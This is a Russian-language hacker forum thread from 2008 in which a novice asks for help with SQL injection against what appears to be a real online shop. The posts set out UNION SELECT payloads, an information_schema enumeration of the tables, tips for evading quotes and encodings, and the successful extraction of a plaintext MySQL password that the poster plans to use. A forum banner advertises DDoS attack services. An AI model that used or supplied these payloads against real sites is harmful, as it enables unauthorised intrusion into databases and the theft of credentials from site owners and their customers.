В общем вот что нарыл по сайту:
/?action=product_view&id=-12+union+select+1,...,10,concat_ws(0x3C62723E,DATABASE(),VERSION(),USER()),..,48+--
имя базы версия имя пользователя базы
main 5.0.45 advip@localhost
-12+union+select+1,..,10,user,12,password,..,48+from+musql.user/*
Table 'musql.user' doesn't exist
Далее искал названия таблиц следующим запросом:
/?action=product_view&id=-12+union+select+1,..,TABLE_NAME,12,..,48+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--
в поле выводилось не больше одной строки, получил след данные:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
bevip_admin
bevip_article
bevip_article_category
bevip_catalog
bevip_city
bevip_currency
bevip_customer
bevip_delivery
bevip_dictionary
bevip_discount
bevip_faq
bevip_guestbook
bevip_help
bevip_indexpromo
bevip_info
bevip_mail_list
bevip_metro
bevip_news
bevip_order_complete
bevip_order_content
bevip_order_status
bevip_payment
bevip_product
bevip_promotion
bevip_search
bevip_subscribe
bevip_systemvar
bevip_vendor
*********************
dressshop_admin
dressshop_article и тд.....
********************
pbs_admin
pbs_article и тд.....
*******************
sum_admin
sum_article и тд...
********************
columns_priv
db
func
help_category
help_keyword
help_relation
А теперь загвоздка, не могу сформировать запрос с WHERE и тд, короче подскажите как продвигаться дальше, не ругайтесь за возможную тупость вопроса, первый раз делаю.....
Если не трудно напишите пример запроса на колонку из нужной таблицы, и как замаскировать в запросе кавычки?
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
[ DDos Услуги. DDos атака. Заказать ДДос ] |
0
Вопрос по SQL injection
Автор
KoIIIaK
, 08 May 2008 15:57
#2
Отправлено 08 May 2008 - 16:04
Ну начнем с того что правильно mysql.user
какая ошибка вылазит?
select column_name from information_schema.columns where table_name='TABLE NAME'/*
'TABLE NAME' - попробуй в HEX или CHAR() закодировать...
попробуй
%27, 0x27, " ; иногда что тока не проканывает ;)
Цитата
не могу сформировать запрос с WHERE
Цитата
напишите пример запроса на колонку из нужной таблицы
'TABLE NAME' - попробуй в HEX или CHAR() закодировать...
Цитата
как замаскировать в запросе кавычки
%27, 0x27, " ; иногда что тока не проканывает ;)
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
*********
icq:162295
*********
#3
Отправлено 08 May 2008 - 16:17
Спасибо, блин с опечаткой в названии ступил конечно))
в хекс и чар загонял, ругается, сейчас проверю предложенные варианты и отпишусь, ошибки тож укажу.
Спасибо за своевременную помощь)
Добавлено:
?action=product_view&id=-12+union+select+1,2,3,user,...48+from+mysql.user+--
выдал норм: advip
а при следующем
?action=product_view&id=-12+union+select+1,2,3,password,...48+from+mysql.user+--
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ему не нравиться кодировка?
да просто не могу разобраться что из вышеперечисленных полученных названия является таблицами а что колонками, попробую перебором...
в хекс и чар загонял, ругается, сейчас проверю предложенные варианты и отпишусь, ошибки тож укажу.
Спасибо за своевременную помощь)
Добавлено:
?action=product_view&id=-12+union+select+1,2,3,user,...48+from+mysql.user+--
выдал норм: advip
а при следующем
?action=product_view&id=-12+union+select+1,2,3,password,...48+from+mysql.user+--
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ему не нравиться кодировка?
Цитата
select column_name from information_schema.columns where table_name='TABLE NAME'/*
#4
Отправлено 08 May 2008 - 17:22
Цитата
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
l.user--
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
*********
icq:162295
*********
#5
Отправлено 08 May 2008 - 17:33
aka PSIH (8.5.2008, 17:22) писал:
Цитата
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
l.user--
пасиб даже не хэш а сам пароль)) Осталось найти куда его ввести) спс всем
НУ ДУМАЮ ТЕМА ЗАКРЫТО ОГРОМНОЕ СПАСИБО aka PSIH
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных